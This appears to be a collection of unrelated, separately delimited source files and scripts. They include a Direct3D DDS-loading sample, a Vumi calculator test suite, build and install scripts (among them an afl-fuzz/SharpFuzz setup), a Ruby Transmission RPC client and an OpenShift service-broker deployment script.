sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/pcimem.c -o build/pcimem.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_sinit.c -o build/xspi_sinit.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_options.c -o build/xspi_options.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_g.c -o build/xspi_g.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi.c -o build/xspi.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/flash_qspi_rw.c -o build/flash_qspi_rw.o
sudo gcc -pthread -shared build/pcimem.o build/xspi_sinit.o build/xspi_options.o build/xspi_g.o build/xspi.o build/flash_qspi_rw.o -L/usr/lib/x86_64-linux-gnu -L/usr/local/lib -o libFlashProvider.so
sudo cp *.so ../../bin/Linux
|
<reponame>billionare/FPSLighting
//--------------------------------------------------------------------------------------
// File: DDSWithoutD3DX9.cpp
//
// Illustrates loading a DDS file without using D3DX
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//--------------------------------------------------------------------------------------
#include "DXUT.h"
#include "DXUTgui.h"
#include "DXUTmisc.h"
#include "DXUTCamera.h"
#include "DXUTSettingsDlg.h"
#include "SDKmisc.h"
#include "SDKmesh.h"
#include "resource.h"
#include "DDSTextureLoader.h"
//--------------------------------------------------------------------------------------
// Global variables
//--------------------------------------------------------------------------------------
extern CModelViewerCamera g_Camera; // A model viewing camera
extern CDXUTDialogResourceManager g_DialogResourceManager; // manager for shared resources of dialogs
extern CD3DSettingsDlg g_SettingsDlg; // Device settings dialog
extern CDXUTTextHelper* g_pTxtHelper;
extern CDXUTDialog g_HUD; // dialog for standard controls
extern CDXUTDialog g_SampleUI; // dialog for sample specific controls
extern CDXUTSDKMesh g_Mesh; // mesh object
// Direct3D 9 resources
ID3DXFont* g_pFont9 = NULL;
ID3DXSprite* g_pSprite9 = NULL;
ID3DXEffect* g_pEffect9 = NULL;
IDirect3DVertexDeclaration9* g_pDecl9 = NULL;
IDirect3DTexture9* g_pTexture9 = NULL;
D3DXHANDLE g_hRenderScene;
D3DXHANDLE g_hmWorld;
D3DXHANDLE g_hmWorldViewProjection;
D3DXHANDLE g_htxDiffuse;
#define IDC_LOAD_TEXTURE 4
//--------------------------------------------------------------------------------------
// Forward declarations
//--------------------------------------------------------------------------------------
bool CALLBACK IsD3D9DeviceAcceptable( D3DCAPS9* pCaps, D3DFORMAT AdapterFormat, D3DFORMAT BackBufferFormat,
bool bWindowed, void* pUserContext );
HRESULT CALLBACK OnD3D9CreateDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
void* pUserContext );
HRESULT CALLBACK OnD3D9ResetDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
void* pUserContext );
void CALLBACK OnD3D9FrameRender( IDirect3DDevice9* pd3dDevice, double fTime, float fElapsedTime, void* pUserContext );
void CALLBACK OnD3D9LostDevice( void* pUserContext );
void CALLBACK OnD3D9DestroyDevice( void* pUserContext );
extern void RenderText();
//--------------------------------------------------------------------------------------
// Rejects any D3D9 devices that aren't acceptable to the app by returning false
//--------------------------------------------------------------------------------------
bool CALLBACK IsD3D9DeviceAcceptable( D3DCAPS9* pCaps, D3DFORMAT AdapterFormat,
D3DFORMAT BackBufferFormat, bool bWindowed, void* pUserContext )
{
// No fallback defined by this app, so reject any device that
// doesn't support at least ps2.0
if( pCaps->PixelShaderVersion < D3DPS_VERSION( 2, 0 ) )
return false;
return true;
}
//--------------------------------------------------------------------------------------
// Create any D3D9 resources that will live through a device reset (D3DPOOL_MANAGED)
// and aren't tied to the back buffer size
//--------------------------------------------------------------------------------------
HRESULT CALLBACK OnD3D9CreateDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
void* pUserContext )
{
HRESULT hr;
V_RETURN( g_DialogResourceManager.OnD3D9CreateDevice( pd3dDevice ) );
V_RETURN( g_SettingsDlg.OnD3D9CreateDevice( pd3dDevice ) );
V_RETURN( D3DXCreateFont( pd3dDevice, 15, 0, FW_BOLD, 1, FALSE, DEFAULT_CHARSET,
OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE,
L"Arial", &g_pFont9 ) );
// Read the D3DX effect file
WCHAR str[MAX_PATH];
DWORD dwShaderFlags = D3DXFX_NOT_CLONEABLE | D3DXFX_LARGEADDRESSAWARE;
#ifdef DEBUG_VS
dwShaderFlags |= D3DXSHADER_FORCE_VS_SOFTWARE_NOOPT;
#endif
#ifdef DEBUG_PS
dwShaderFlags |= D3DXSHADER_FORCE_PS_SOFTWARE_NOOPT;
#endif
V_RETURN( DXUTFindDXSDKMediaFileCch( str, MAX_PATH, L"DDSWithoutD3DX.fx" ) );
V_RETURN( D3DXCreateEffectFromFile( pd3dDevice, str, NULL, NULL, dwShaderFlags,
NULL, &g_pEffect9, NULL ) );
g_hRenderScene = g_pEffect9->GetTechniqueByName( "RenderScene" );
g_hmWorld = g_pEffect9->GetParameterByName( NULL, "g_mWorld" );
g_hmWorldViewProjection = g_pEffect9->GetParameterByName( NULL, "g_mWorldViewProjection" );
g_htxDiffuse = g_pEffect9->GetParameterByName( NULL, "g_txDiffuse" );
// Create a decl for the object data.
D3DVERTEXELEMENT9 declDesc[] =
{
{0, 0, D3DDECLTYPE_FLOAT3, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_POSITION, 0},
{0, 12, D3DDECLTYPE_FLOAT3, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_NORMAL, 0},
{0, 24, D3DDECLTYPE_FLOAT2, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_TEXCOORD, 0},
{0xFF,0,D3DDECLTYPE_UNUSED, 0,0,0}// D3DDECL_END
};
V_RETURN( pd3dDevice->CreateVertexDeclaration( declDesc, &g_pDecl9 ) );
// Setup the camera's view parameters
D3DXVECTOR3 vecEye( 0.0f, 0.0f, -5.0f );
D3DXVECTOR3 vecAt ( 0.0f, 0.0f, 0.0f );
g_Camera.SetViewParams( &vecEye, &vecAt );
return S_OK;
}
//--------------------------------------------------------------------------------------
// Create any D3D9 resources that won't live through a device reset (D3DPOOL_DEFAULT)
// or that are tied to the back buffer size
//--------------------------------------------------------------------------------------
HRESULT CALLBACK OnD3D9ResetDevice( IDirect3DDevice9* pd3dDevice,
const D3DSURFACE_DESC* pBackBufferSurfaceDesc, void* pUserContext )
{
HRESULT hr;
V_RETURN( g_DialogResourceManager.OnD3D9ResetDevice() );
V_RETURN( g_SettingsDlg.OnD3D9ResetDevice() );
if( g_pFont9 ) V_RETURN( g_pFont9->OnResetDevice() );
if( g_pEffect9 ) V_RETURN( g_pEffect9->OnResetDevice() );
V_RETURN( D3DXCreateSprite( pd3dDevice, &g_pSprite9 ) );
g_pTxtHelper = new CDXUTTextHelper( g_pFont9, g_pSprite9, 15 );
// Setup the camera's projection parameters
float fAspectRatio = pBackBufferSurfaceDesc->Width / ( FLOAT )pBackBufferSurfaceDesc->Height;
g_Camera.SetProjParams( D3DX_PI / 4, fAspectRatio, 0.1f, 1000.0f );
g_Camera.SetWindow( pBackBufferSurfaceDesc->Width, pBackBufferSurfaceDesc->Height );
g_HUD.SetLocation( pBackBufferSurfaceDesc->Width - 170, 0 );
g_HUD.SetSize( 170, 170 );
g_SampleUI.SetLocation( pBackBufferSurfaceDesc->Width - 170, pBackBufferSurfaceDesc->Height - 350 );
g_SampleUI.SetSize( 170, 300 );
// load the mesh
V_RETURN( g_Mesh.Create( pd3dDevice, L"misc\\ball.sdkmesh" ) );
// Load the texture
WCHAR str[MAX_PATH];
V_RETURN( DXUTFindDXSDKMediaFileCch( str, MAX_PATH, L"misc\\seafloor.dds" ) );
V_RETURN( CreateDDSTextureFromFile( pd3dDevice, str, &g_pTexture9 ) );
if( DXUTIsWindowed() )
g_SampleUI.GetButton( IDC_LOAD_TEXTURE )->SetEnabled( true );
else
g_SampleUI.GetButton( IDC_LOAD_TEXTURE )->SetEnabled( false );
return S_OK;
}
//--------------------------------------------------------------------------------------
// Render the scene using the D3D9 device
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9FrameRender( IDirect3DDevice9* pd3dDevice, double fTime, float fElapsedTime, void* pUserContext )
{
HRESULT hr = S_OK;
// If the settings dialog is being shown, then render it instead of rendering the app's scene
if( g_SettingsDlg.IsActive() )
{
g_SettingsDlg.OnRender( fElapsedTime );
return;
}
D3DXMATRIX mWorld = *g_Camera.GetWorldMatrix();
D3DXMATRIX mView = *g_Camera.GetViewMatrix();
D3DXMATRIX mProj = *g_Camera.GetProjMatrix();
D3DXMATRIX mWorldViewProjection = mWorld * mView * mProj;
// Clear the render target and the zbuffer
V( pd3dDevice->Clear( 0, NULL, D3DCLEAR_TARGET | D3DCLEAR_ZBUFFER, D3DCOLOR_ARGB( 0, 160, 160, 250 ), 1.0f, 0 ) );
// Render the scene
if( SUCCEEDED( pd3dDevice->BeginScene() ) )
{
g_pEffect9->SetMatrix( g_hmWorld, &mWorld );
g_pEffect9->SetMatrix( g_hmWorldViewProjection, &mWorldViewProjection );
g_pEffect9->SetTexture( g_htxDiffuse, g_pTexture9 );
pd3dDevice->SetVertexDeclaration( g_pDecl9 );
g_Mesh.Render( pd3dDevice, g_pEffect9, g_hRenderScene );
DXUT_BeginPerfEvent( DXUT_PERFEVENTCOLOR, L"HUD / Stats" ); // These events are to help PIX identify what the code is doing
RenderText();
V( g_HUD.OnRender( fElapsedTime ) );
V( g_SampleUI.OnRender( fElapsedTime ) );
DXUT_EndPerfEvent();
V( pd3dDevice->EndScene() );
}
}
//--------------------------------------------------------------------------------------
// Release D3D9 resources created in the OnD3D9ResetDevice callback
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9LostDevice( void* pUserContext )
{
g_DialogResourceManager.OnD3D9LostDevice();
g_SettingsDlg.OnD3D9LostDevice();
DXUTGetGlobalResourceCache().OnLostDevice();
if( g_pFont9 ) g_pFont9->OnLostDevice();
if( g_pEffect9 ) g_pEffect9->OnLostDevice();
SAFE_RELEASE( g_pSprite9 );
SAFE_DELETE( g_pTxtHelper );
g_Mesh.Destroy();
SAFE_RELEASE( g_pTexture9 );
}
//--------------------------------------------------------------------------------------
// Release D3D9 resources created in the OnD3D9CreateDevice callback
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9DestroyDevice( void* pUserContext )
{
g_DialogResourceManager.OnD3D9DestroyDevice();
g_SettingsDlg.OnD3D9DestroyDevice();
DXUTGetGlobalResourceCache().OnDestroyDevice();
SAFE_RELEASE( g_pEffect9 );
SAFE_RELEASE( g_pFont9 );
SAFE_RELEASE( g_pDecl9 );
}
|
<reponame>seidu626/vumi
from twisted.internet.defer import inlineCallbacks
from vumi.tests.helpers import VumiTestCase
from vumi.application.tests.helpers import ApplicationHelper
from vumi.demos.calculator import CalculatorApp
from vumi.message import TransportUserMessage
class TestCalculatorApp(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.app_helper = self.add_helper(ApplicationHelper(CalculatorApp))
self.worker = yield self.app_helper.get_application({})
@inlineCallbacks
def test_session_start(self):
yield self.app_helper.make_dispatch_inbound(
None, session_event=TransportUserMessage.SESSION_NEW)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(
resp['content'],
'What would you like to do?\n'
'1. Add\n'
'2. Subtract\n'
'3. Multiply')
@inlineCallbacks
def test_first_number(self):
yield self.app_helper.make_dispatch_inbound(
'1', session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(resp['content'], 'What is the first number?')
@inlineCallbacks
def test_second_number(self):
self.worker.save_session('+41791234567', {
'action': 1,
})
yield self.app_helper.make_dispatch_inbound(
'1', session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(resp['content'], 'What is the second number?')
@inlineCallbacks
def test_action(self):
self.worker.save_session('+41791234567', {
'action': 0, # add
'first_number': 2,
})
yield self.app_helper.make_dispatch_inbound(
'2', session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(resp['content'], 'The result is: 4.')
self.assertEqual(resp['session_event'],
TransportUserMessage.SESSION_CLOSE)
@inlineCallbacks
def test_invalid_input(self):
self.worker.save_session('+41791234567', {
'action': 0, # add
})
yield self.app_helper.make_dispatch_inbound(
'not-an-int', session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(resp['content'], 'Sorry invalid input!')
self.assertEqual(resp['session_event'],
TransportUserMessage.SESSION_CLOSE)
@inlineCallbacks
def test_invalid_action(self):
yield self.app_helper.make_dispatch_inbound(
'not-an-option', session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertTrue(
resp['content'].startswith('Sorry invalid input!'))
@inlineCallbacks
def test_user_cancellation(self):
self.worker.save_session('+41791234567', {'foo': 'bar'})
yield self.app_helper.make_dispatch_inbound(
None, session_event=TransportUserMessage.SESSION_CLOSE)
self.assertEqual(self.worker.get_session('+41791234567'), {})
@inlineCallbacks
def test_none_input_on_session_resume(self):
yield self.app_helper.make_dispatch_inbound(
None, session_event=TransportUserMessage.SESSION_RESUME)
[resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
self.assertEqual(resp['content'], 'Sorry invalid input!')
|
#!/bin/bash
dieharder -d 11 -g 203 -S 2328956153
|
#!/usr/bin/env bash
# nbdkit
# Copyright (C) 2017 Red Hat Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Red Hat nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY RED HAT AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RED HAT OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
pidfile=shebang-python.pid
sockfile=shebang-python.sock
script=$SRCDIR/shebang.py
if test ! -d "$SRCDIR"; then
echo "$0: could not locate shebang.py"
exit 1
fi
rm -f $pidfile $sockfile
$script -P $pidfile -U $sockfile -f -v &
# We may have to wait a short time for the pid file to appear.
for i in {1..60}; do
if test -f $pidfile; then
break
fi
sleep 1
done
if ! test -f $pidfile; then
echo "$0: PID file was not created"
exit 1
fi
pid="$(cat $pidfile)"
# Check the process exists.
kill -s 0 $pid
# Check the socket was created (and is a socket).
test -S $sockfile
# Kill the process.
kill $pid
# Check the process exits (eventually).
for i in {1..10}; do
if ! kill -s 0 $pid; then
break;
fi
sleep 1
done
if kill -s 0 $pid; then
echo "$0: process did not exit after sending a signal"
exit 1
fi
rm $pidfile $sockfile
|
#!/bin/bash
#
# Copyright (C) 2016 The CyanogenMod Project
# Copyright (C) 2017 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
# Required!
DEVICE_COMMON=g4-common
VENDOR=lge
# Load extractutils and do some sanity checks
MY_DIR="${BASH_SOURCE%/*}"
if [[ ! -d "$MY_DIR" ]]; then MY_DIR="$PWD"; fi
LINEAGE_ROOT="$MY_DIR"/../../..
HELPER="$LINEAGE_ROOT"/vendor/lineage/build/tools/extract_utils.sh
if [ ! -f "$HELPER" ]; then
echo "Unable to find helper script at $HELPER"
exit 1
fi
. "$HELPER"
# Initialize the helper
setup_vendor "$DEVICE_COMMON" "$VENDOR" "$LINEAGE_ROOT" true
# Copyright headers and guards
write_headers "ls991_usu f500_usu h810_usu h811 h812_usu h815 h815_usu h818_usu h819_usu us991_usu vs986_usu"
# Common blobs
write_makefiles "$MY_DIR"/proprietary-files.txt
# We are done with common
write_footers
# Initialize the helper for device
setup_vendor "$DEVICE" "$VENDOR" "$LINEAGE_ROOT"
# Copyright headers and guards
write_headers
# The device blobs
write_makefiles "$MY_DIR"/../$DEVICE/proprietary-files.txt
# We are done with device
write_footers
|
#!/bin/bash
python -c "from optimade.server.main import app, update_schema; update_schema(app)"
python -c "from optimade.server.main_index import app, update_schema; update_schema(app)"
diff=$(jsondiff ./openapi/openapi.json ./openapi/local_openapi.json);
index_diff=$(jsondiff ./openapi/index_openapi.json ./openapi/local_index_openapi.json);
if [ ! "$diff" = "{}" ]; then
echo -e "Generated OpenAPI spec for test server did not match committed version.\nRun 'invoke update-openapijson' and re-commit.\nDiff:\n$diff";
exit 1;
fi
if [ ! "$index_diff" = "{}" ]; then
echo -e "Generated OpenAPI spec for Index meta-database did not match committed version.\nRun 'invoke update-openapijson' and re-commit.\nDiff:\n$index_diff";
exit 1;
fi
|
#!/bin/sh
set -ex
git init
git remote add origin git@github.com:{{ cookiecutter.github_org }}/{{ cookiecutter.github_project }}.git
git config user.name "{{ cookiecutter.full_name }}"
git config user.email "{{ cookiecutter.email }}"
|
<filename>src/SplayLibrary/Core/DefaultFramebuffer.cpp<gh_stars>1-10
#include <SplayLibrary/SplayLibrary.hpp>
#include <SplayLibrary/Private/Private.hpp>
namespace spl
{
DefaultFramebuffer::DefaultFramebuffer(Window* window) : Framebuffer(window)
{
}
}
|
<gh_stars>0
package com.biachacon.tasks.resources;
import com.biachacon.tasks.domains.Task;
import com.biachacon.tasks.services.TaskService;
import java.util.List;
import java.net.URI;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.CrossOrigin;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
@CrossOrigin(origins = "*")
@RequestMapping(value = "/task")
@RestController
public class TaskResource {
@Autowired
private TaskService service;
@PostMapping
public ResponseEntity<Void> insert( @RequestBody Task obj) {
obj = service.insert(obj);
URI uri = ServletUriComponentsBuilder.fromCurrentRequest()
.path("/{id}").buildAndExpand(obj.getId()).toUri();
return ResponseEntity.created(uri).build();
}
@GetMapping
public ResponseEntity<List<Task>> findAll() {
List<Task> list = service.findAll();
return ResponseEntity.ok().body(list);
}
@GetMapping(value = "/{status}")
public ResponseEntity<List<Task>> findAllByStatus(@PathVariable Boolean status) {
List<Task> list = service.findAllByStatus(status);
return ResponseEntity.ok().body(list);
}
@DeleteMapping(value="/{id}")
public ResponseEntity<Void> delete(@PathVariable Integer id) {
service.deleteById(id);
return ResponseEntity.noContent().build();
}
@PutMapping(value="/{id}")
public ResponseEntity<Void> update(@PathVariable Integer id) {
service.updateStatus(id);
return ResponseEntity.noContent().build();
}
@DeleteMapping
public ResponseEntity<Void> deleteAllStatusCompleted() {
this.service.deleteAllStatusCompleted();
return ResponseEntity.noContent().build();
}
}
|
var structarm__cfft__instance__q15 =
[
[ "bitRevLength", "structarm__cfft__instance__q15.html#a738907cf34bdbbaf724414ac2decbc3c", null ],
[ "fftLen", "structarm__cfft__instance__q15.html#a5f9e1d3a8c127ee323b5e6929aeb90df", null ],
[ "pBitRevTable", "structarm__cfft__instance__q15.html#ac9160b80243b99a0b6e2f75ddb5cf0ae", null ],
[ "pTwiddle", "structarm__cfft__instance__q15.html#afdaf12ce4687cec021c5ae73d0987a3f", null ]
]; |
<reponame>mrako/simple-weather-frontend
module.exports = require('babel-jest').createTransformer({
presets: [
'@babel/preset-react',
['@babel/env', { targets: { node: 'current' } }],
],
});
|
python3 predict.py --input_file data/viatis/test/seq.in \
--output_file predictions.txt \
--model_dir viatis_phobert_crf_attn/4e-5/0.15
|
require 'httparty'
require_relative 'amplitude/errors/amplitude_error'
require_relative 'amplitude/errors/action_error'
require_relative 'amplitude/errors/authentication_error'
require_relative 'amplitude/client'
module Amplitude
DEFAULT_FIELDS = %w(id name totalSize)
PRIORITIZATION_ACTIONS = %w(up down top bottom)
def self.client
@client
end
def self.configure(&blk)
options = OpenStruct.new
yield(options)
@client = Amplitude::Client.new(
username: options.username,
password: <PASSWORD>,
url: options.url,
debug: options.debug || false
)
end
def self.build_args(ids, opts = {})
ids = [ids].flatten.uniq
args = {}
args[:ids] = ids if ids.length > 0
opts.merge(args)
end
def self.ids_action(name, ids, opts = {})
client.action(name, build_args(ids, opts))
end
def self.all(fields = [])
find([], fields)
end
def self.find(ids = [], fields = [])
ids = [ids].flatten.uniq
args = {}
args[:ids] = ids if ids.length > 0
args[:fields] = (DEFAULT_FIELDS + fields).uniq
data = client.action('torrent-get', args)
data['torrents']
end
def self.set(args)
args['ids'].flatten!.uniq! if args['ids']
client.action('torrent-set', args)
end
def self.start(ids)
ids_action('torrent-start', ids)
end
def self.start_now(ids)
ids_action('torrent-start-now', ids)
end
def self.stop(ids)
ids_action('torrent-stop', ids)
end
def self.verify(ids)
ids_action('torrent-verify', ids)
end
def self.reannounce(ids)
ids_action('torrent-reannounce', ids)
end
def self.add(filename, metainfo = nil, opts = {})
args = {}
args[:filename] = filename if filename
args[:metainfo] = filename if metainfo
opts.merge!(args)
data = client.action('torrent-add', opts)
if data['torrent-duplicate']
fail ActionError("Torrent #{filename} already exists", 500)
end
data['torrent-added']
end
def self.remove(ids, hard_delete = false)
ids_action(
'torrent-remove',
ids,
'delete-local-data' => hard_delete
)
end
def self.move(ids, location, move = false)
ids_action(
'torrent-set-location',
ids,
location: location,
move: move
)
end
def self.rename(ids, path, name)
ids_action(
'torrent-rename-path',
ids,
path: path,
name: name
)
end
def self.session_get
client.action('session-get')
end
def self.session_set(args)
client.action('session-set', args)
end
def self.session_stats
client.action('session-stats')
end
def self.update_blocklist
data = client.action('blocklist-update')
data['blocklist-size']
end
def self.test_port
data = client.action('port-test')
data['port-is-open']
end
def self.close_session
client.action('session-close')
end
def self.prioritize(ids, action)
unless PRIORITIZATION_ACTIONS.include?(action)
fail ActionError('Priorization actions are top, bottom, up and down', 400)
end
ids_action("queue-move-#{action}", ids)
end
def self.free_space(path)
data = client.action('free-space', path: path)
data['size-bytes']
end
end
|
ICON=$HOME/.config/i3/images/icon.png
TMPBG=/tmp/screen.png
scrot /tmp/screen.png
convert $TMPBG -scale 10% -scale 1000% $TMPBG
convert $TMPBG $ICON -gravity center -composite -matte $TMPBG
i3lock -u -i $TMPBG
rm $TMPBG
|
<reponame>a-type/react-layout
export { default as Content } from './Content';
export { Provider, Consumer } from './Context';
export { default as Grid } from './Grid';
|
#!/bin/bash
set -e
aflVersion=2.52b
# Download and extract the afl-fuzz source package
wget https://lcamtuf.coredump.cx/afl/releases/afl-"$aflVersion".tgz
tar -xvf afl-"$aflVersion".tgz
rm afl-"$aflVersion".tgz
cd afl-"$aflVersion"/
# Patch afl-fuzz so that it doesn't check whether the binary
# being fuzzed is instrumented (we have to do this because
# we are going to run our programs with the dotnet run command,
# and the dotnet binary would fail this check)
wget https://github.com/Metalnem/sharpfuzz/raw/master/patches/RemoveInstrumentationCheck.diff
patch < RemoveInstrumentationCheck.diff
# Install afl-fuzz
sudo make install
cd ..
rm -rf afl-"$aflVersion"/
# Install SharpFuzz.CommandLine global .NET tool
dotnet tool install --global SharpFuzz.CommandLine
|
<filename>word-level-language-id/train.py
# -*- coding: utf-8 -*-
from LanguageModel import LanguageModel
ngram = 2
# Language codes
fr = 'ga'
en = 'en'
# Language model files.
fr_lm_fn = 'word-level-language-id/models/ga.lm'
en_lm_fn = 'word-level-language-id/models/en.lm'
# Unigram frequency lexicons.
fr_lex = 'word-level-language-id/corpora/ga-words.txt'
en_lex = 'word-level-language-id/corpora/en-GB-words.txt'
# Load lexicons.
fr_lm = LanguageModel(fr, ngram, fr_lex)
en_lm = LanguageModel(en, ngram, en_lex)
# Train and save character n-gram models.
fr_lm.train()
fr_lm.dump(fr_lm_fn)
en_lm.train()
en_lm.dump(en_lm_fn)
|
def calculate_expected_shape(input_dims, group_size):
grouped_points_shape = {
'features': (8, 256, group_size, input_dims),
'points': (8, 256, group_size, 3),
'padding': (8, 256, group_size)
}
query_points_shape = {
'points': (8, 256, 3),
'padding': (8, 256)
}
return {'grouped_points_shape': grouped_points_shape, 'query_points_shape': query_points_shape} |
#!/bin/bash
#
# Minimal example for deploying latest built 'Ansible Service Broker'
# on oc cluster up
#
#
# We deploy oc cluster up with an explicit hostname and routing suffix
# so that pods can access routes internally.
#
# For example, we need to register the ansible service broker route to
# the service catalog when we create the broker resource. The service
# catalog needs to be able to communicate to the ansible service broker.
#
# When we use the default "127.0.0.1.nip.io" route suffix, requests
# from inside the cluster fail with an error like:
#
# From Service Catalog: controller manager
# controller.go:196] Error syncing Broker ansible-service-broker:
# Get https://asb-1338-ansible-service-broker.127.0.0.1.nip.io/v2/catalog:
# dial tcp 127.0.0.1:443: getsockopt: connection refused
#
# To resolve this, we explicitly set the
# --public-hostname and --routing-suffix
#
# We use the IP of the docker interface on our host for testing in a
# local environment, or the external listening IP if we want to expose
# the cluster to the outside.
#
# Below will default to grabbing the IP of docker0, typically this is
# 172.17.0.1 if not customized
#
DOCKER_IP="$(ip addr show docker0 | grep -Po 'inet \K[\d.]+')"
PUBLIC_IP=${PUBLIC_IP:-$DOCKER_IP}
HOSTNAME=${PUBLIC_IP}.nip.io
ROUTING_SUFFIX="${HOSTNAME}"
ORIGIN_IMAGE=${ORIGIN_IMAGE:-"docker.io/openshift/origin"}
ORIGIN_VERSION=${ORIGIN_VERSION:-"latest"}
oc cluster up --image=${ORIGIN_IMAGE} \
--version=${ORIGIN_VERSION} \
--service-catalog=true \
--routing-suffix=${ROUTING_SUFFIX} \
--public-hostname=${HOSTNAME}
#
# Logging in as system:admin so we can create a clusterrolebinding and
# creating ansible-service-broker project
#
oc login -u system:admin
oc new-project ansible-service-broker
#
# A valid dockerhub username/password is required so the broker may
# authenticate with dockerhub to:
#
# 1) inspect the available repositories in an organization
# 2) read the manifest of each repository to determine metadata about
# the images
#
# This is how the Ansible Service Broker determines what content to
# expose to the Service Catalog
#
# Note: dockerhub API requirements require an authenticated user only,
# the user does not need any special access beyond read access to the
# organization.
#
# By default, the Ansible Service Broker will look at the
# 'ansibleplaybookbundle' organization, this can be overridden with the
# parameter DOCKERHUB_ORG being passed into the template.
#
TEMPLATE_URL=${TEMPLATE_URL:-"https://raw.githubusercontent.com/openshift/ansible-service-broker/master/templates/deploy-ansible-service-broker.template.yaml"}
DOCKERHUB_ORG=${DOCKERHUB_ORG:-"ansibleplaybookbundle"} # DocherHub org where APBs can be found, default 'ansibleplaybookbundle'
